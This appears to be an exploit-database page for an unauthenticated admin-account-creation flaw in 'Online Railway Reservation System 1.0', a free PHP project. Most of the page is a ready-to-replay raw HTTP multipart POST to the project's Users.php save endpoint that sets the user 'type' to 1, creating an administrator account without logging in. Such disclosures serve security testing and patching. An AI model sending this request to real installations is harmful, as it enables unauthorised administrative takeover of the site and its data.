Online railway reservation system 1.0 admin account creation (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-01-10 |
Type : webapps |
Platform : php
[+] Code ...
#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"
1